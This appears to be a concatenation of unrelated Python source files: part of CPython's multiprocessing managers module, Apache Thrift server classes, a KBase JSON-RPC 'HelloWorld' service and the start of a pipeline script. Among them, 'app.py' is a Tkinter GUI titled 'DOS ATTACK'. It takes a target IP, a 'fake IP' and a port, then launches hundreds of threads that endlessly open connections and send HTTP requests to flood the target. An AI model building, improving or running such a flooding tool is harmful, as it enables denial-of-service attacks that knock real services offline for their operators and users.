'__contains__', '__delitem__', '__getitem__', '__iter__', '__len__',
'__setitem__', 'clear', 'copy', 'get', 'items',
'keys', 'pop', 'popitem', 'setdefault', 'update', 'values'
))
DictProxy._method_to_typeid_ = {
'__iter__': 'Iterator',
}
ArrayProxy = MakeProxyType('ArrayProxy', (
'__len__', '__getitem__', '__setitem__'
))
BasePoolProxy = MakeProxyType('PoolProxy', (
'apply', 'apply_async', 'close', 'imap', 'imap_unordered', 'join',
'map', 'map_async', 'starmap', 'starmap_async', 'terminate',
))
BasePoolProxy._method_to_typeid_ = {
'apply_async': 'AsyncResult',
'map_async': 'AsyncResult',
'starmap_async': 'AsyncResult',
'imap': 'Iterator',
'imap_unordered': 'Iterator'
}
class PoolProxy(BasePoolProxy):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.terminate()
#
# Definition of SyncManager
#
class SyncManager(BaseManager):
'''
Subclass of `BaseManager` which supports a number of shared object types.
The types registered are those intended for the synchronization
of threads, plus `dict`, `list` and `Namespace`.
The `multiprocessing.Manager()` function creates started instances of
this class.
'''
SyncManager.register('Queue', queue.Queue)
SyncManager.register('JoinableQueue', queue.Queue)
SyncManager.register('Event', threading.Event, EventProxy)
SyncManager.register('Lock', threading.Lock, AcquirerProxy)
SyncManager.register('RLock', threading.RLock, AcquirerProxy)
SyncManager.register('Semaphore', threading.Semaphore, AcquirerProxy)
SyncManager.register('BoundedSemaphore', threading.BoundedSemaphore,
AcquirerProxy)
SyncManager.register('Condition', threading.Condition, ConditionProxy)
SyncManager.register('Barrier', threading.Barrier, BarrierProxy)
SyncManager.register('Pool', pool.Pool, PoolProxy)
SyncManager.register('list', list, ListProxy)
SyncManager.register('dict', dict, DictProxy)
SyncManager.register('Value', Value, ValueProxy)
SyncManager.register('Array', Array, ArrayProxy)
SyncManager.register('Namespace', Namespace, NamespaceProxy)
# types returned by methods of PoolProxy
SyncManager.register('Iterator', proxytype=IteratorProxy, create_method=False)
SyncManager.register('AsyncResult', create_method=False)
#
# Definition of SharedMemoryManager and SharedMemoryServer
#
if HAS_SHMEM:
class _SharedMemoryTracker:
"Manages one or more shared memory segments."
def __init__(self, name, segment_names=[]):
self.shared_memory_context_name = name
self.segment_names = segment_names
def register_segment(self, segment_name):
"Adds the supplied shared memory block name to tracker."
util.debug(f"Register segment {segment_name!r} in pid {getpid()}")
self.segment_names.append(segment_name)
def destroy_segment(self, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the list of blocks being tracked."""
util.debug(f"Destroy segment {segment_name!r} in pid {getpid()}")
self.segment_names.remove(segment_name)
segment = shared_memory.SharedMemory(segment_name)
segment.close()
segment.unlink()
def unlink(self):
"Calls destroy_segment() on all tracked shared memory blocks."
for segment_name in self.segment_names[:]:
self.destroy_segment(segment_name)
def __del__(self):
util.debug(f"Call {self.__class__.__name__}.__del__ in {getpid()}")
self.unlink()
def __getstate__(self):
return (self.shared_memory_context_name, self.segment_names)
def __setstate__(self, state):
self.__init__(*state)
class SharedMemoryServer(Server):
public = Server.public + \
['track_segment', 'release_segment', 'list_segments']
def __init__(self, *args, **kwargs):
Server.__init__(self, *args, **kwargs)
address = self.address
# The address of Linux abstract namespaces can be bytes
if isinstance(address, bytes):
address = os.fsdecode(address)
self.shared_memory_context = \
_SharedMemoryTracker(f"shm_{address}_{getpid()}")
util.debug(f"SharedMemoryServer started by pid {getpid()}")
def create(self, c, typeid, /, *args, **kwargs):
"""Create a new distributed-shared object (not backed by a shared
memory block) and return its id to be used in a Proxy Object."""
# Unless set up as a shared proxy, don't make shared_memory_context
# a standard part of kwargs. This makes things easier for supplying
# simple functions.
if hasattr(self.registry[typeid][-1], "_shared_memory_proxy"):
kwargs['shared_memory_context'] = self.shared_memory_context
return Server.create(self, c, typeid, *args, **kwargs)
def shutdown(self, c):
"Call unlink() on all tracked shared memory, terminate the Server."
self.shared_memory_context.unlink()
return Server.shutdown(self, c)
def track_segment(self, c, segment_name):
"Adds the supplied shared memory block name to Server's tracker."
self.shared_memory_context.register_segment(segment_name)
def release_segment(self, c, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the tracker instance inside the Server."""
self.shared_memory_context.destroy_segment(segment_name)
def list_segments(self, c):
"""Returns a list of names of shared memory blocks that the Server
is currently tracking."""
return self.shared_memory_context.segment_names
class SharedMemoryManager(BaseManager):
"""Like SyncManager but uses SharedMemoryServer instead of Server.
It provides methods for creating and returning SharedMemory instances
and for creating a list-like object (ShareableList) backed by shared
memory. It also provides methods that create and return Proxy Objects
that support synchronization across processes (i.e. multi-process-safe
locks and semaphores).
"""
_Server = SharedMemoryServer
def __init__(self, *args, **kwargs):
if os.name == "posix":
# bpo-36867: Ensure the resource_tracker is running before
# launching the manager process, so that concurrent
# shared_memory manipulation both in the manager and in the
# current process does not create two resource_tracker
# processes.
from . import resource_tracker
resource_tracker.ensure_running()
BaseManager.__init__(self, *args, **kwargs)
util.debug(f"{self.__class__.__name__} created by pid {getpid()}")
def __del__(self):
util.debug(f"{self.__class__.__name__}.__del__ by pid {getpid()}")
pass
def get_server(self):
'Better than monkeypatching for now; merge into Server ultimately'
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started SharedMemoryServer")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("SharedMemoryManager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return self._Server(self._registry, self._address,
self._authkey, self._serializer)
def SharedMemory(self, size):
"""Returns a new SharedMemory instance with the specified size in
bytes, to be tracked by the manager."""
with self._Client(self._address, authkey=self._authkey) as conn:
sms = shared_memory.SharedMemory(None, create=True, size=size)
try:
dispatch(conn, None, 'track_segment', (sms.name,))
except BaseException as e:
sms.unlink()
raise e
return sms
def ShareableList(self, sequence):
"""Returns a new ShareableList instance populated with the values
from the input sequence, to be tracked by the manager."""
with self._Client(self._address, authkey=self._authkey) as conn:
sl = shared_memory.ShareableList(sequence)
try:
dispatch(conn, None, 'track_segment', (sl.shm.name,))
except BaseException as e:
sl.shm.unlink()
raise e
return sl
|
app.py
|
from tkinter import *
from tkinter.ttk import Combobox
import tkinter.messagebox
import threading
import socket
import time
class Dos:
def __init__(self,root):
self.root=root
self.root.title("DOS ATTACK")
self.root.geometry("450x400")
self.root.iconbitmap("logo980.ico")
self.root.resizable(0,0)
port=IntVar()
target_address=StringVar()
fake_ip=StringVar()
attackrange=IntVar()
def clear():
fake_ip.set("")
target_address.set("")
port.set("Select Port Number")
attackrange.set("Select Attack Range")
def attack():
try:
if target_address.get()!="":
if fake_ip.get()!="":
if port.get()!="Select Port Number":
if attackrange.get()!="Select Attack Range":
while True:
stream=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
stream.connect((target_address.get(),port.get()))
stream.sendto((f"GET /{target_address.get()} HTTP/1.1\r\n").encode("ascii"),(target_address.get(),port.get()))
stream.sendto((f"Host: {fake_ip.get()}\r\n\r\n").encode('ascii'),(target_address.get(),port.get()))
stream.close()
else:
tkinter.messagebox.showerror("Error","Please Select Attack Range")
else:
tkinter.messagebox.showerror("Error","Please Select the port number")
else:
tkinter.messagebox.showerror("Error","Please Enter A correct Fake Address")
else:
tkinter.messagebox.showerror("Error","Please Enter A correct Target Address")
except Exception as e:
tkinter.messagebox.showerror("Error",e)
def thread_attack():
x=attackrange.get()
for i in range(x):
thread=threading.Thread(target=attack)
time.sleep(4)
thread.start()
#================mainframe===============================#
mainframe=Frame(self.root,width=450,height=400,relief="ridge",bd=3)
mainframe.place(x=0,y=0)
firstframe=Frame(mainframe,width=444,height=340,relief="ridge",bd=3,bg="gray77")
firstframe.place(x=0,y=0)
secondframe=Frame(mainframe,width=444,height=53,relief="ridge",bd=3,bg="gray77")
secondframe.place(x=0,y=340)
#=====================firstframe==================================#
lab_target_ip=Label(firstframe,text="Enter Target IP Address",font=('times new roman',14),bg="gray77")
lab_target_ip.place(x=120,y=4)
ent_target_ip=Entry(firstframe,width=38,font=('times new roman',12),relief="ridge",bd=3,textvariable=target_address)
ent_target_ip.place(x=60,y=40)
lab_fake_ip=Label(firstframe,text="Enter Fake IP Address",font=('times new roman',14),bg="gray77")
lab_fake_ip.place(x=120,y=100)
ent_fake_ip=Entry(firstframe,width=38,font=('times new roman',12),relief="ridge",bd=3,textvariable=fake_ip)
ent_fake_ip.place(x=60,y=140)
ports=["80","20","21","22","23","25","50","51","53","67","68","69","110",\
"119","123","135","139","143","161","162","389","443","989","990","3389"]
ports_combo=Combobox(firstframe,values=ports,font=('arial',14),width=20,state="readonly",textvariable=port)
ports_combo.set("Select Port Number")
ports_combo.place(x=90,y=200)
attack_range=list(range(100,1000,5))
attack_range_combo=Combobox(firstframe,values=attack_range,font=('arial',14),width=20,state="readonly",textvariable=attackrange)
attack_range_combo.set("Select Attack Range")
attack_range_combo.place(x=90,y=260)
#=====================secondframe=================================#
but_Attack=Button(secondframe,width=17,text="Attack",font=('times new roman',12),cursor="hand2",command=thread_attack)
but_Attack.place(x=20,y=7)
but_Clear=Button(secondframe,width=17,text="Clear",font=('times new roman',12),cursor="hand2",command=clear)
but_Clear.place(x=250,y=7)
if __name__ == "__main__":
root=Tk()
Dos(root)
root.mainloop()
|
TServer.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import Queue
import logging
import os
import sys
import threading
import traceback
from thrift.Thrift import TProcessor
from thrift.protocol import TBinaryProtocol
from thrift.transport import TTransport
class TServer:
"""Base interface for a server, which must have a serve() method.
Three constructors for all servers:
1) (processor, serverTransport)
2) (processor, serverTransport, transportFactory, protocolFactory)
3) (processor, serverTransport,
inputTransportFactory, outputTransportFactory,
inputProtocolFactory, outputProtocolFactory)
"""
def __init__(self, *args):
if (len(args) == 2):
self.__initArgs__(args[0], args[1],
TTransport.TTransportFactoryBase(),
TTransport.TTransportFactoryBase(),
TBinaryProtocol.TBinaryProtocolFactory(),
TBinaryProtocol.TBinaryProtocolFactory())
elif (len(args) == 4):
self.__initArgs__(args[0], args[1], args[2], args[2], args[3], args[3])
elif (len(args) == 6):
self.__initArgs__(args[0], args[1], args[2], args[3], args[4], args[5])
def __initArgs__(self, processor, serverTransport,
inputTransportFactory, outputTransportFactory,
inputProtocolFactory, outputProtocolFactory):
self.processor = processor
self.serverTransport = serverTransport
self.inputTransportFactory = inputTransportFactory
self.outputTransportFactory = outputTransportFactory
self.inputProtocolFactory = inputProtocolFactory
self.outputProtocolFactory = outputProtocolFactory
def serve(self):
pass
class TSimpleServer(TServer):
"""Simple single-threaded server that just pumps around one transport."""
def __init__(self, *args):
TServer.__init__(self, *args)
def serve(self):
self.serverTransport.listen()
while True:
client = self.serverTransport.accept()
if not client:
continue
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, tx:
pass
except Exception, x:
logging.exception(x)
itrans.close()
otrans.close()
class TThreadedServer(TServer):
"""Threaded server that spawns a new thread per each connection."""
def __init__(self, *args, **kwargs):
TServer.__init__(self, *args)
self.daemon = kwargs.get("daemon", False)
def serve(self):
self.serverTransport.listen()
while True:
try:
client = self.serverTransport.accept()
if not client:
continue
t = threading.Thread(target=self.handle, args=(client,))
t.setDaemon(self.daemon)
t.start()
except KeyboardInterrupt:
raise
except Exception, x:
logging.exception(x)
def handle(self, client):
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, tx:
pass
except Exception, x:
logging.exception(x)
itrans.close()
otrans.close()
class TThreadPoolServer(TServer):
"""Server with a fixed size pool of threads which service requests."""
def __init__(self, *args, **kwargs):
TServer.__init__(self, *args)
self.clients = Queue.Queue()
self.threads = 10
self.daemon = kwargs.get("daemon", False)
def setNumThreads(self, num):
"""Set the number of worker threads that should be created"""
self.threads = num
def serveThread(self):
"""Loop around getting clients from the shared queue and process them."""
while True:
try:
client = self.clients.get()
self.serveClient(client)
except Exception, x:
logging.exception(x)
def serveClient(self, client):
"""Process input/output from a client for as long as possible"""
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, tx:
pass
except Exception, x:
logging.exception(x)
itrans.close()
otrans.close()
def serve(self):
"""Start a fixed number of worker threads and put client into a queue"""
for i in range(self.threads):
try:
t = threading.Thread(target=self.serveThread)
t.setDaemon(self.daemon)
t.start()
except Exception, x:
logging.exception(x)
# Pump the socket for clients
self.serverTransport.listen()
while True:
try:
client = self.serverTransport.accept()
if not client:
continue
self.clients.put(client)
except Exception, x:
logging.exception(x)
class TForkingServer(TServer):
"""A Thrift server that forks a new process for each request
This is more scalable than the threaded server as it does not cause
GIL contention.
Note that this has different semantics from the threading server.
Specifically, updates to shared variables will no longer be shared.
It will also not work on windows.
This code is heavily inspired by SocketServer.ForkingMixIn in the
Python stdlib.
"""
def __init__(self, *args):
TServer.__init__(self, *args)
self.children = []
def serve(self):
def try_close(file):
try:
file.close()
except IOError, e:
logging.warning(e, exc_info=True)
self.serverTransport.listen()
while True:
client = self.serverTransport.accept()
if not client:
continue
try:
pid = os.fork()
if pid: # parent
# add before collect, otherwise you race w/ waitpid
self.children.append(pid)
self.collect_children()
# Parent must close socket or the connection may not get
# closed promptly
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
try_close(itrans)
try_close(otrans)
else:
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
ecode = 0
try:
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, tx:
pass
except Exception, e:
logging.exception(e)
ecode = 1
finally:
try_close(itrans)
try_close(otrans)
os._exit(ecode)
except TTransport.TTransportException, tx:
pass
except Exception, x:
logging.exception(x)
def collect_children(self):
while self.children:
try:
pid, status = os.waitpid(0, os.WNOHANG)
except os.error:
pid = None
if pid:
self.children.remove(pid)
else:
break
|
kb_HelloWorldServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from kb_HelloWorld.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_HelloWorld'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_HelloWorld.kb_HelloWorldImpl import kb_HelloWorld # noqa @IgnorePep8
impl_kb_HelloWorld = kb_HelloWorld(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_HelloWorld'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_HelloWorld.printhelloworld,
name='kb_HelloWorld.printhelloworld',
types=[dict])
self.method_authentication['kb_HelloWorld.printhelloworld'] = 'required' # noqa
self.rpc_service.add(impl_kb_HelloWorld.status,
name='kb_HelloWorld.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_HelloWorld ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
pipeline.py
|
#!/usr/bin/env python3
import hashlib
import threading
import networkx as nx # type: ignore
import os
import sys
import signal
import socket
import time
import re
import resource
from collections import defaultdict
from datetime import datetime
import subprocess
from shlex import split
from multiprocessing import Process, Event # type: ignore
from configargparse import Namespace
import logging
import functools
import math
from typing import Any
try:
from sys import intern
except:
"older Python doesn't namespace `intern`, so do nothing"
# TODO move this and Pyro4 imports down into launchServer where pipeline name is available?
#os.environ["PYRO_LOGLEVEL"] = os.getenv("PYRO_LOGLEVEL", "INFO")
